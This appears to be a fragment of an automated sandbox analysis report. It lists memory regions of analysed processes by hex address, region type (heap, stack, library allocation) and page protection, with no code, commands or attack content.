trusted library allocation
|
page read and write
|
||
|
7FF64D60B000
|
unkown
|
page readonly
|
||
|
533B976000
|
stack
|
page read and write
|
||
|
1BE8102F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
1BE8186B000
|
trusted library allocation
|
page read and write
|
||
|
2494745B000
|
heap
|
page read and write
|
||
|
2494C8A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB30000
|
trusted library allocation
|
page read and write
|
||
|
1BEEDE00000
|
heap
|
page read and write
|
||
|
7FFD9B7AB000
|
trusted library allocation
|
page read and write
|
||
|
249474B0000
|
heap
|
page read and write
|
||
|
144EFA20000
|
heap
|
page read and write
|
||
|
24947E00000
|
trusted library allocation
|
page read and write
|
||
|
1BE813C4000
|
trusted library allocation
|
page read and write
|
||
|
533BCFB000
|
stack
|
page read and write
|
||
|
1823402B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1154FFE4000
|
heap
|
page read and write
|
||
|
1BE902EB000
|
trusted library allocation
|
page read and write
|
||
|
1BEEFEF2000
|
heap
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BEF0139000
|
heap
|
page read and write
|
||
|
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BEEE030000
|
trusted library allocation
|
page read and write
|
||
|
DE024FE000
|
unkown
|
page readonly
|
||
|
2494C8C4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page read and write
|
||
|
24947400000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
1BEF019E000
|
heap
|
page read and write
|
||
|
7DF4255C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
533B67E000
|
stack
|
page read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
|
1BEEE137000
|
heap
|
page read and write
|
||
|
7FFD9B826000
|
trusted library allocation
|
page read and write
|
||
|
24947C00000
|
heap
|
page read and write
|
||
|
1823BEB0000
|
heap
|
page read and write
|
||
|
533B32E000
|
unkown
|
page read and write
|
||
|
1BE80C02000
|
trusted library allocation
|
page read and write
|
||
|
1155001B000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB60000
|
trusted library allocation
|
page read and write
|
||
|
249474A2000
|
heap
|
page read and write
|
||
|
182258C4000
|
trusted library allocation
|
page read and write
|
||
|
144EDFD0000
|
heap
|
page read and write
|
||
|
1BEF012C000
|
heap
|
page read and write
|
||
|
1BEF001B000
|
heap
|
page read and write
|
||
|
2494C9B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C0FB7000
|
stack
|
page read and write
|
||
|
144EE051000
|
heap
|
page read and write
|
||
|
2494D000000
|
heap
|
page read and write
|
||
|
2494C950000
|
trusted library allocation
|
page read and write
|
||
|
4C0C7E000
|
stack
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
18223850000
|
heap
|
page read and write
|
||
|
2494CC00000
|
remote allocation
|
page read and write
|
||
|
1154FFB0000
|
heap
|
page read and write
|
||
|
18224015000
|
trusted library allocation
|
page read and write
|
||
|
1BEEFEE3000
|
heap
|
page read and write
|
||
|
1BE90001000
|
trusted library allocation
|
page read and write
|
||
|
18233D3F000
|
trusted library allocation
|
page read and write
|
||
|
2494C903000
|
trusted library allocation
|
page read and write
|
||
|
4C1039000
|
stack
|
page read and write
|
||
|
24947D5A000
|
heap
|
page read and write
|
||
|
7FFD9B856000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
533B9FA000
|
stack
|
page read and write
|
||
|
11550385000
|
heap
|
page read and write
|
||
|
7FFD9B772000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B876000
|
trusted library allocation
|
page execute and read and write
|
||
|
533BC7F000
|
stack
|
page read and write
|
||
|
1BE80C34000
|
trusted library allocation
|
page read and write
|
||
|
F848FE000
|
stack
|
page read and write
|
||
|
7FFD9B774000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
1BEEDE44000
|
heap
|
page read and write
|
||
|
4C08E3000
|
stack
|
page read and write
|
||
|
18223852000
|
heap
|
page read and write
|
||
|
2494CAE4000
|
heap
|
page read and write
|
||
|
533B8F8000
|
stack
|
page read and write
|
||
|
7FF64D60F000
|
unkown
|
page readonly
|
||
|
A5EC9FE000
|
stack
|
page read and write
|
||
|
182241A8000
|
trusted library allocation
|
page read and write
|
||
|
1BE90072000
|
trusted library allocation
|
page read and write
|
||
|
24947280000
|
heap
|
page read and write
|
||
|
144EE110000
|
heap
|
page read and write
|
||
|
F84B7D000
|
stack
|
page read and write
|
||
|
1BE81E29000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page execute and read and write
|
||
|
18223BF0000
|
trusted library allocation
|
page read and write
|
||
|
1BE81786000
|
trusted library allocation
|
page read and write
|
||
|
1BEF00DC000
|
heap
|
page read and write
|
||
|
24947497000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
DE019FE000
|
unkown
|
page readonly
|
||
|
1BEEDEB1000
|
heap
|
page read and write
|
||
|
1BEF00C4000
|
heap
|
page read and write
|
||
|
1BE804CC000
|
trusted library allocation
|
page read and write
|
||
|
24947506000
|
heap
|
page read and write
|
||
|
DE022FE000
|
unkown
|
page readonly
|
||
|
DE02A7E000
|
stack
|
page read and write
|
||
|
2494C7D0000
|
trusted library allocation
|
page read and write
|
||
|
DE021FB000
|
stack
|
page read and write
|
||
|
18223BD0000
|
trusted library allocation
|
page read and write
|
||
|
1154FFF6000
|
heap
|
page read and write
|
||
|
2494C8D2000
|
trusted library allocation
|
page read and write
|
||
|
4C123E000
|
stack
|
page read and write
|
||
|
1BE81004000
|
trusted library allocation
|
page read and write
|
||
|
1BE80001000
|
trusted library allocation
|
page read and write
|
||
|
1D7D13CC000
|
heap
|
page read and write
|
||
|
1BEEFFED000
|
heap
|
page read and write
|
||
|
24947D04000
|
heap
|
page read and write
|
||
|
2494C862000
|
trusted library allocation
|
page read and write
|
||
|
533BAFF000
|
stack
|
page read and write
|
||
|
7FFD9B7BB000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
18223BB0000
|
trusted library allocation
|
page read and write
|
||
|
4C0CFD000
|
stack
|
page read and write
|
||
|
4C1C8F000
|
stack
|
page read and write
|
||
|
1BEEF970000
|
heap
|
page execute and read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
533B77E000
|
stack
|
page read and write
|
||
|
18223CA0000
|
heap
|
page execute and read and write
|
||
|
2494C8A4000
|
trusted library allocation
|
page read and write
|
||
|
533B6F9000
|
stack
|
page read and write
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page execute and read and write
|
||
|
249473B0000
|
trusted library allocation
|
page read and write
|
||
|
DE011FE000
|
unkown
|
page readonly
|
||
|
2494C91A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
|
18221F86000
|
heap
|
page read and write
|
||
|
2494C990000
|
trusted library allocation
|
page read and write
|
||
|
24947D02000
|
heap
|
page read and write
|
||
|
533C6CE000
|
stack
|
page read and write
|
||
|
1D7D12D5000
|
heap
|
page read and write
|
||
|
18223C60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAC9000
|
trusted library allocation
|
page read and write
|
||
|
1155000B000
|
heap
|
page read and write
|
||
|
24947502000
|
heap
|
page read and write
|
||
|
18224272000
|
trusted library allocation
|
page read and write
|
||
|
144EE04B000
|
heap
|
page read and write
|
||
|
A5ECEFE000
|
unkown
|
page readonly
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
|
249474B0000
|
heap
|
page read and write
|
||
|
24947529000
|
heap
|
page read and write
|
||
|
DE010FE000
|
stack
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
2494CE30000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
1BEEE130000
|
heap
|
page read and write
|
||
|
1BE81953000
|
trusted library allocation
|
page read and write
|
||
|
1823BFD0000
|
heap
|
page execute and read and write
|
||
|
24E75A02000
|
trusted library allocation
|
page read and write
|
||
|
1154FFE0000
|
heap
|
page read and write
|
||
|
1BEEE010000
|
trusted library allocation
|
page read and write
|
||
|
1BEF024C000
|
heap
|
page read and write
|
||
|
1BEEF966000
|
heap
|
page execute and read and write
|
||
|
11550000000
|
heap
|
page read and write
|
||
|
DE00FFE000
|
unkown
|
page readonly
|
||
|
2494C95C000
|
trusted library allocation
|
page read and write
|
||
|
18223DBA000
|
trusted library allocation
|
page read and write
|
||
|
1BEEFF6F000
|
heap
|
page read and write
|
||
|
7DF464250000
|
trusted library allocation
|
page execute and read and write
|
||
|
1823BF73000
|
heap
|
page read and write
|
||
|
1823C2F0000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2494C940000
|
trusted library allocation
|
page read and write
|
||
|
115501B0000
|
heap
|
page read and write
|
||
|
2494742B000
|
heap
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B94A000
|
trusted library allocation
|
page read and write
|
||
|
144EDFB0000
|
heap
|
page read and write
|
||
|
7FFD9B7B0000
|
trusted library allocation
|
page read and write
|
||
|
1BEEDDA0000
|
heap
|
page read and write
|
||
|
1D7D12E0000
|
heap
|
page read and write
|
||
|
A5ECDFE000
|
stack
|
page read and write
|
||
|
F84C7F000
|
stack
|
page read and write
|
||
|
1154FFC0000
|
heap
|
page read and write
|
||
|
1BEF01C8000
|
heap
|
page read and write
|
||
|
1BEF022A000
|
heap
|
page read and write
|
||
|
1155001B000
|
heap
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
1BEF00D8000
|
heap
|
page read and write
|
||
|
24947513000
|
heap
|
page read and write
|
||
|
1BEEE0C0000
|
trusted library allocation
|
page read and write
|
||
|
533C7CD000
|
stack
|
page read and write
|
||
|
18233EF5000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page execute and read and write
|
||
|
2494C960000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B972000
|
trusted library allocation
|
page read and write
|
||
|
2494CB0A000
|
heap
|
page read and write
|
||
|
1BEEFA67000
|
heap
|
page read and write
|
||
|
24947D1A000
|
heap
|
page read and write
|
||
|
18221F10000
|
heap
|
page read and write
|
||
|
1BEF0149000
|
heap
|
page read and write
|
||
|
1BE80D72000
|
trusted library allocation
|
page read and write
|
||
|
24947443000
|
heap
|
page read and write
|
||
|
F849F5000
|
stack
|
page read and write
|
||
|
7FF64D600000
|
unkown
|
page readonly
|
||
|
2494C951000
|
trusted library allocation
|
page read and write
|
||
|
2494CA42000
|
heap
|
page read and write
|
||
|
24947D00000
|
heap
|
page read and write
|
||
|
1BEF010F000
|
heap
|
page read and write
|
||
|
249472A0000
|
heap
|
page read and write
|
||
|
1BEEFFF6000
|
heap
|
page read and write
|
||
|
11550000000
|
heap
|
page read and write
|
||
|
2494C95F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
4C12BB000
|
stack
|
page read and write
|
||
|
1155000B000
|
heap
|
page read and write
|
||
|
18221F40000
|
heap
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
1155000B000
|
heap
|
page read and write
|
||
|
144EE115000
|
heap
|
page read and write
|
||
|
7FFD9B773000
|
trusted library allocation
|
page execute and read and write
|
||
|
11550380000
|
heap
|
page read and write
|
||
|
7FF64D601000
|
unkown
|
page execute read
|
||
|
2494C840000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
|
2494C8EE000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
24947502000
|
heap
|
page read and write
|
||
|
1154FFEC000
|
heap
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
2494C9C0000
|
trusted library allocation
|
page read and write
|
||
|
1BEF00C8000
|
heap
|
page read and write
|
||
|
24948320000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
4C113E000
|
stack
|
page read and write
|
||
|
1BEF00C0000
|
heap
|
page read and write
|
||
|
2494CAEA000
|
heap
|
page read and write
|
||
|
1BEEFA62000
|
heap
|
page read and write
|
||
|
1BEEFA75000
|
heap
|
page read and write
|
||
|
DE023F9000
|
stack
|
page read and write
|
||
|
2494C967000
|
trusted library allocation
|
page read and write
|
||
|
1155001B000
|
heap
|
page read and write
|
||
|
7FFD9BAA3000
|
trusted library allocation
|
page read and write
|
||
|
1BEEFEE7000
|
heap
|
page read and write
|
||
|
24E7523F000
|
heap
|
page read and write
|
||
|
24947479000
|
heap
|
page read and write
|
||
|
1823BEEE000
|
heap
|
page read and write
|
||
|
2494C7E0000
|
trusted library allocation
|
page read and write
|
||
|
2494CC00000
|
remote allocation
|
page read and write
|
||
|
18223C20000
|
trusted library allocation
|
page read and write
|
||
|
2494CA2C000
|
heap
|
page read and write
|
||
|
1D7D14C0000
|
heap
|
page read and write
|
||
|
4C0DFE000
|
stack
|
page read and write
|
||
|
1BE902F0000
|
trusted library allocation
|
page read and write
|
||
|
18221E30000
|
heap
|
page read and write
|
||
|
2494CB05000
|
heap
|
page read and write
|
||
|
533BB7F000
|
stack
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
D279EFC000
|
stack
|
page read and write
|
There are 561 hidden memdumps, click here to show them.